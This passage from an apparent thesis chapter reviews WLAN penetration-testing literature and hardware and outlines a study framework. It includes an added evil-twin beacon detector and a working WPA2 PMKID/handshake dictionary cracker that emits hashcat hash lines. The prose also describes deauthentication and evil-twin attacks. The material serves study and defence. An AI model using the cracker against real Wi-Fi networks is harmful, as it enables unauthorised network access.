Features on our system also available in the cited study: Penetration testing methodology: the researchers describe the process of conducting a penetration test on a WLAN, including the different types of tests that can be performed (such as vulnerability scanning, password cracking and social engineering). Tools and techniques: the researchers discuss the various tools and techniques commonly used in penetration testing, such as brute-force password cracking tools.
Research Gap: The study needed to develop more comprehensive and effective methodologies for conducting penetration testing on WLANs that take into account both security and performance considerations. This would help ensure that WLANs are sufficiently protected from potential security threats while maintaining optimal performance levels.

Study: Penetration testing and security analysis of wireless networks: A survey
Author/s: Sudhakar et al.
Year: 2018
Features on our system also available in the cited study: Security protocols: the survey analyses various security protocols for wireless networks, including WEP, WPA and WPA2. Penetration testing tools: the researchers provide an overview of popular penetration testing tools such as Aircrack-ng.
Research Gap: The study does not specifically focus on vulnerabilities of wireless local area networks (WLANs). There is therefore a need for more research that specifically addresses the challenges of WLAN penetration testing, which could include developing specialised tools for penetration testing.

Study: A Survey on Network Penetration Testing
Author/s: G. Jayasuryapal et al.
Year: 2021
Features on our system also available in the cited study: Attack types: the researchers discuss various attack types, such as brute-force attacks, denial-of-service attacks and social engineering attacks.
Research Gap: There is a need for further research into the specific challenges and best practices for conducting effective penetration testing on WLANs, as well as the development of specialised tools and techniques to address these challenges.

Study: Efficacy of Unconventional Penetration Testing Practices
Author/s: S. Mishra
Year: 2021
Features on our system also available in the cited study: Social engineering: the paper examines the use of social engineering in penetration testing, including phishing attacks and baiting.
Research Gap: The study may not be sufficient to detect all potential vulnerabilities in WLANs, especially with the increasing complexity of WLAN architectures and attack techniques.

SYNTHESIS

Reviewing the literature and studies related to Penetration Testing for Wireless Local Area Networks (WLAN) gave the researchers additional knowledge for their study. According to Mehta (2021)[20], a pen-test is used by organizations to uncover, test and highlight security flaws. Pen testing differs from other cybersecurity evaluation approaches in that it can be customised to any enterprise or organization; depending on the structure and activities of the organization, a particular set of hacking methods or tools may be authorised.

As stated by Kevin Beaver (2018)[21], having the essential tools for penetration testing makes it easier to perform the task efficiently, and there are many tools intended for penetrating a Wireless Local Area Network (WLAN). According to Robb, D. (2020)[22], a variety of Wi-Fi testing tools is available on the market today; many are open source or free, and the alternatives each come with their own set of features, benefits and price points. Connecting this to the present study, the researchers investigate the different tools that might be used to pen-test the WLAN.

According to Hautzinger (2021)[23], the Wi-Fi Pineapple is a network auditing device used by several cybersecurity and networking organizations. It can imitate Wi-Fi networks, disguise itself as a network a client already recognises, and convince Wi-Fi users to join the Pineapple's network instead (an evil-twin attack). As per Hak5 (2019)[26], the Wi-Fi Pineapple Mark VII pairs a simple, direct web interface with next-generation network processors, several role-based radios and the PineAP suite, which together produce remarkable results. However, according to NI Cyber Guy (2021)[25], the Wi-Fi Pineapple is one of the most dangerous devices available: it is powerful and adaptable equipment that, depending on the user's goal, may be either beneficial or harmful. Although the Wi-Fi Pineapple can be misused, it also gives defenders a much better chance of recognising and preventing the attacks it emulates.
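The evil-twin behaviour described above can also be checked for from the defender's side. The following is an added example for this chapter, not code from the original page or from Hak5: it parses 802.11 beacon frames as captured in monitor mode and flags any BSSID that advertises a trusted SSID but is not on the allow-list, calling out separately a twin that advertises the SSID without an RSN element (open or WEP, which is what a Pineapple typically broadcasts). The SSID "CEA-WLAN", the BSSIDs and the beacon frames are constructed for the example.

```python
"""Evil-twin check over 802.11 beacon frames.

Added example for this chapter (not Hak5's or the thesis's own code).
The beacon frames below are constructed; the frame layout follows
IEEE 802.11 (24-byte MAC header, 12-byte fixed fields, then IEs).
"""
import struct
from collections import defaultdict

IE_SSID = 0
IE_RSN = 48
MGMT_BEACON = 0x0080   # frame control: type 0 (management), subtype 8 (beacon)


def parse_beacon(frame: bytes):
    """Return (bssid, ssid, has_rsn) for a beacon frame, or None for anything else."""
    if len(frame) < 36:
        return None
    fc = struct.unpack("<H", frame[:2])[0]
    if fc & 0x00FC != MGMT_BEACON:
        return None
    bssid = frame[16:22]           # address 3 of a beacon is the BSSID
    ies = frame[36:]               # after timestamp(8), interval(2), capability(2)
    ssid, has_rsn, pos = None, False, 0
    while pos + 2 <= len(ies):
        eid, elen = ies[pos], ies[pos + 1]
        body = ies[pos + 2:pos + 2 + elen]
        if len(body) != elen:      # truncated element: stop rather than misparse
            break
        if eid == IE_SSID:
            ssid = body.decode("utf-8", "replace")
        elif eid == IE_RSN:
            has_rsn = True
        pos += 2 + elen
    return bssid, ssid, has_rsn


def find_evil_twins(frames, trusted):
    """trusted maps SSID -> set of legitimate BSSIDs (bytes).

    Returns (ssid, bssid_str, reason) for every beacon that uses a trusted
    SSID from an unknown BSSID; an unknown BSSID with no RSN element (an open
    or WEP twin) is reported with its own reason.
    """
    seen = defaultdict(dict)
    for frame in frames:
        parsed = parse_beacon(frame)
        if parsed:
            bssid, ssid, has_rsn = parsed
            seen[ssid][bssid] = has_rsn
    findings = []
    for ssid, aps in seen.items():
        if ssid not in trusted:
            continue
        for bssid, has_rsn in aps.items():
            if bssid not in trusted[ssid]:
                reason = "unknown BSSID" + ("" if has_rsn else ", no RSN (open/WEP)")
                findings.append((ssid, bssid.hex(":"), reason))
    return findings


def build_beacon(bssid: bytes, ssid: str, rsn: bool = True) -> bytes:
    """Construct a minimal beacon for the example (not a real capture)."""
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = b"\x00" * 8 + b"\x64\x00" + b"\x11\x04"      # timestamp, interval, capability
    ies = bytes([IE_SSID, len(ssid)]) + ssid.encode()
    if rsn:
        # RSNE: version 1, group CCMP, one pairwise CCMP, one AKM PSK, capabilities 0
        rsn_body = (b"\x01\x00" + b"\x00\x0f\xac\x04" + b"\x01\x00" + b"\x00\x0f\xac\x04"
                    + b"\x01\x00" + b"\x00\x0f\xac\x02" + b"\x00\x00")
        ies += bytes([IE_RSN, len(rsn_body)]) + rsn_body
    return header + fixed + ies


# constructed sample: one legitimate AP, two twins of its SSID, one unrelated AP
LEGIT_BSSID = bytes.fromhex("021122334455")
TRUSTED = {"CEA-WLAN": {LEGIT_BSSID}}
SAMPLE_FRAMES = [
    build_beacon(LEGIT_BSSID, "CEA-WLAN"),
    build_beacon(bytes.fromhex("02deadbeef01"), "CEA-WLAN", rsn=False),  # open twin
    build_beacon(bytes.fromhex("02deadbeef02"), "CEA-WLAN"),             # WPA2 twin
    build_beacon(bytes.fromhex("02cafef00d01"), "Guest"),                # not ours
]

if __name__ == "__main__":
    for finding in find_evil_twins(SAMPLE_FRAMES, TRUSTED):
        print(*finding)
```

In practice the frames would come from a monitor-mode capture (for example a PCAP written by airodump-ng) rather than from build_beacon; the allow-list is the set of BSSIDs the campus IT office actually operates.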

In accordance with N. Balaji (2020)[28], one of the newest platforms for penetration testing is the Raspberry Pi, a compact computer, sometimes called a "microcomputer," made more flexible and practical by hardware accessories. The cited author notes that it does not run the desktop operating systems testers may be used to, such as Windows. According to Pantech ELearning (2021)[29], its slower CPU limits multitasking, and MACFOS (2020)[30] states that because the Raspberry Pi lacks internal storage it must use a micro-SD card in its place. The board also ships without heatsinks or cooling fans; without a heat sink or cooling it will eventually reach temperatures well above 70 degrees Celsius if used continuously for 6 to 7 hours.

According to N. Balaji (2020)[28], Kali Linux is a free operating system made for security analytics and penetration testing. Kali is a toolset that advanced users employ for information security tests to identify and fix potential software flaws. As per Williams (2020)[32], approximately 600 preconfigured penetration-testing programs are available in Kali Linux, each with a different degree of flexibility and application. Nevertheless, Khanna (2022)[33] states that Kali Linux is not for complete beginners: it is a penetration testing distribution intended for advanced users, and the cited author describes it as lacking a graphical user interface (GUI), so that all tasks must be completed from the command line. (The standard Kali images do in fact ship a desktop environment; the practical point is that most of its tools, Aircrack-ng included, are command-line programs.)

As stated by Cyberpunk (2018)[35], Alfa's AWUS036NHA is one of the best wireless adapters the company has made for Wi-Fi hacking and pen testing, and among the best tools for wireless pen testing with Kali Linux. It is compact, affordable and has a wide range, and because its drivers are already included, setup is simple. With this adapter a tester can run man-in-the-middle (MITM) attacks, inject ARP frames for a WEP replay attack, capture a WPA2-PSK four-way handshake (the material needed for offline passphrase recovery) and reveal hidden SSIDs, among other things. The drawback, according to Chahal (2018)[36], is that such USB adapters lack an external antenna, which reduces their power and range (the AWUS036NHA itself ships with a detachable RP-SMA antenna, so this criticism applies mainly to compact adapters), and most users of USB adapters complain of the reduced speeds they experience. Because the adapter is plug-and-play and needs no installation, anyone with physical access can use it, which the same author treats as a risk of unrestricted access to the user's data.

As per Son (2021)[38], the ESP32 Wi-Fi penetration tool is an all-purpose tool for carrying out different Wi-Fi attacks. It covers capturing PMKIDs (sent by the access point in the first message of the WPA2 handshake) and full four-way handshakes, using techniques such as standing up a cloned (evil-twin) access point or sending deauthentication frames directly, among others. According to Expert (2021)[39], the ESP32 Wi-Fi Penetration Tool also formats the captured data into PCAP and HCCAPX files, which can then be examined with Wireshark and cracked with Hashcat. To control the tool it creates a management access point from which the target and attack type are chosen and the resulting data downloaded. However, according to Federov (2022)[40], the ESP32 only supports Wi-Fi networks in the 2.4 GHz band; it will not connect to a 5 GHz network.
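What a tester does with the PMKID or four-way handshake captured by the ESP32 tool, or by the Alfa adapter with Aircrack-ng, is an offline dictionary attack against the passphrase. The following is an added example for this chapter, not code from the ESP32 tool, Aircrack-ng or Hashcat: it derives the PMK, PMKID, PTK and EAPOL Key MIC as specified in IEEE 802.11-2016 for a WPA2/CCMP network (key descriptor version 2, HMAC-SHA1-128 MIC), recovers the passphrase from either artefact, and writes the PMKID in the hash-line format hashcat mode 22000 accepts. The SSID, MAC addresses, nonces, wordlist, passphrase and EAPOL frame are all constructed for the example, not taken from a real network.

```python
"""Offline WPA2-PSK passphrase recovery from a captured PMKID or 4-way handshake.

Added example for this chapter: not code from the ESP32 Wi-Fi penetration
tool, Aircrack-ng or Hashcat. Key derivation follows IEEE 802.11-2016
(PBKDF2 PMK, PMKID, PRF-384 PTK, HMAC-SHA1-128 Key MIC for key descriptor
version 2 / CCMP). The SSID, MACs, nonces, passphrase and EAPOL frame are
constructed for the example, not taken from a real network.
"""
import hashlib
import hmac

MIC_OFFSET = 81   # Key MIC field inside an EAPOL-Key frame (4-byte EAPOL header + 77)
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), sent by the AP in message 1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PRF-384(PMK, "Pairwise key expansion", min/max MAC || min/max nonce); PTK[0:16] is the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(3):   # 3 x 20 bytes >= 48
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC over the whole EAPOL-Key frame with the MIC field zeroed (HMAC-SHA1, 128-bit)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack_pmkid(candidates, ssid, ap_mac, sta_mac, captured_pmkid):
    """Dictionary attack that needs only message 1 (no connected client required)."""
    for pw in candidates:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac), captured_pmkid):
            return pw
    return None


def crack_handshake(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol_m2):
    """Dictionary attack against the MIC of message 2 of a captured 4-way handshake."""
    captured_mic = eapol_m2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for pw in candidates:
        kck = ptk_from_pmk(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), captured_mic):
            return pw
    return None


def hashcat_22000_pmkid_line(captured_pmkid, ap_mac, sta_mac, ssid) -> str:
    """Hash line for hashcat -m 22000, type 01 (PMKID): WPA*01*PMKID*AP*STA*SSIDhex***"""
    return "WPA*01*%s*%s*%s*%s***" % (captured_pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


# --- constructed sample capture (not a real network) ---
SSID = "CEA-WLAN"
AP_MAC = bytes.fromhex("021122334455")
STA_MAC = bytes.fromhex("02aabbccddee")
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()
WORDLIST = ["password", "12345678", "pangasinan", "urdaneta2023", "cea-wlan"]


def _build_message2(kck: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (SNonce, key info 0x010a) with a valid MIC."""
    body = (b"\x02"                  # descriptor type: RSN
            + b"\x01\x0a"            # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"            # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"  # replay counter 1
            + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * MIC_LEN + b"\x00\x00")                   # MIC placeholder, no key data
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


_PMK = pmk_from_passphrase("urdaneta2023", SSID)   # the passphrase the attacker does not know
CAPTURED_PMKID = pmkid(_PMK, AP_MAC, STA_MAC)
CAPTURED_EAPOL_M2 = _build_message2(ptk_from_pmk(_PMK, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16])

if __name__ == "__main__":
    print("from PMKID     :", crack_pmkid(WORDLIST, SSID, AP_MAC, STA_MAC, CAPTURED_PMKID))
    print("from handshake :", crack_handshake(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_EAPOL_M2))
    print(hashcat_22000_pmkid_line(CAPTURED_PMKID, AP_MAC, STA_MAC, SSID))
```

The cost of the attack is entirely in the 4096-iteration PBKDF2 per candidate; that is why a long, non-dictionary passphrase (or WPA3-SAE, which removes the offline attack altogether) is the only effective defence once a PMKID or handshake has been captured.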

According to Cyberpunk (2019)[41], the LAN Turtle is a covert systems administration and penetration testing tool that offers man-in-the-middle surveillance, network information collection and stealth remote access through a straightforward graphical shell. It has many functions for remote access, MITM and network reconnaissance, and with its various modules an operator can sniff (capture) the data passing through it. However, Tatianna (2018)[42] states that this device is suited only to institutional settings with a large number of desktop PCs and little concern about what is plugged into them; even highly skilled IT staff may be unconcerned about LAN Turtles or entirely unaware of their existence.

The study by Ali Alsahlany, et al. (2019)[53], entitled "Experimental Evaluation of Different Penetration Security Levels in Wireless Local Area Network," modifies the security mode of the access points and investigates the vulnerabilities associated with the various security levels used to secure a WLAN. Like that study, the present researchers will pen-test a specific WLAN to expose the vulnerabilities of its security protocols. Another study, by F. Fikriyadi et al. (2020)[55], entitled "Security Analysis of Wireless Local Area Network (WLAN) Network with the Penetration Testing Method," examines how security works on a WLAN; because wireless networks are inherently exposed to attack, the authors evaluate the WLAN through penetration testing.

Furthermore, the study by M. K. Khan et al. (2018)[54], entitled "A Comprehensive Study on Penetration Testing Techniques," discusses the different types of wireless networks and identifies the risks associated with each. The researchers also describe the tools and techniques used to assess the security of wireless networks, including rogue access point detection and man-in-the-middle (MITM) attacks.

Moreover, the study by G. Jayasuryapal et al. (2021)[57], entitled "A Survey on Network Penetration Testing," holds that a reliable methodology is essential for a penetration tester to do thorough network testing; the steps include information collection, scanning, enumeration, post-exploitation and reporting. Furthermore, the study by Sudhakar et al. (2018)[56], entitled "Penetration testing and security analysis of wireless networks: A survey," set out to determine the current wireless network security assessment tools and penetration testing techniques. The authors also looked at a variety of penetration testing methodologies such as vulnerability scanning, exploitation and post-exploitation, and examined a range of wireless network vulnerabilities, such as man-in-the-middle, denial-of-service and rogue access point attacks.

Another study, by S. Mishra (2021)[58], entitled "Efficacy of Unconventional Penetration Testing Practices," sets out to use an easier way to penetrate the network. Unconventional ways of testing for vulnerabilities require less time-consuming code writing, are easier to manage and add more to the security assessment; and since technology is always evolving and never remains the same for long, practitioners are constantly confronted with new penetration testing methods they are not yet used to. This study encouraged the researchers to stay flexible in adjusting to changes in pen-testing. After reading and researching penetration-testing-related materials, the researchers gained useful insights for furthering their research and a better understanding of how penetration testing works.

CONCEPTUAL FRAMEWORK

The researchers used Figure 1 as a conceptual diagram to illustrate their proposed project. The research is divided into three phases: input, process and output. The input phase comprises the WLAN pen-testing software suite Aircrack-ng, a pre-installed package in Kali Linux designed for monitoring, attacking and testing wireless networks, together with the Alfa AWUS036NHA USB Wi-Fi adapter and the Wi-Fi Pineapple Mark VII + AC Tactical, which are commonly used hardware for WLAN pen-testing. The process phase is the integration of this software and hardware. The output phase is the set of Wireless Local Area Network (WLAN) pen-testing methods.

Figure 1: Conceptual Framework of the Study. Input: pen-testing software for WLAN; commonly used hardware for pen-testing WLAN. Process: integration. Output: WLAN pen-testing methods.

Research Paradigm

Figure 2: Research Paradigm of the Study. Quadrants: Design Science, Grounded Theory, Action Research, System Development.

This research paradigm was developed by Dr. Napoleon Meimban, a former PSU Urdaneta City Campus faculty member and former Dean of PSU Graduate Studies, and was adapted and revised by Dr. Kenneth Oliver S. Lopez of PSU-UCC to fit the needs of the Bachelor of Science in Computer Engineering research paradigm.

Design Science. Wi-Fi protocols claim to provide security comparable to that of wired networks, and they remain of interest today. However, such protocols are not fully secure and can be the target of key recovery attacks in the real world. The researchers explain how Wireless Local Area Network attacks work and show that they are harder in practice than in theory: their chances of success have often been miscalculated, and their success depends on the test environment, which differs for each contribution. To determine the security strength of a wireless network, the researchers decided to perform penetration testing on the WLAN of the College of Engineering and Architecture of PSU-UCC.

Grounded Theory. The researchers will determine what equipment is suitable for penetration testing and will make use of the versatility and convenience of that equipment to pen-test the said WLANs.

Action Research. The researchers' penetration testing has two phases: the reconnaissance phase and the penetration testing phase.

System Development. The researchers will document the step-by-step procedure for pen-testing a Wireless Local Area Network.
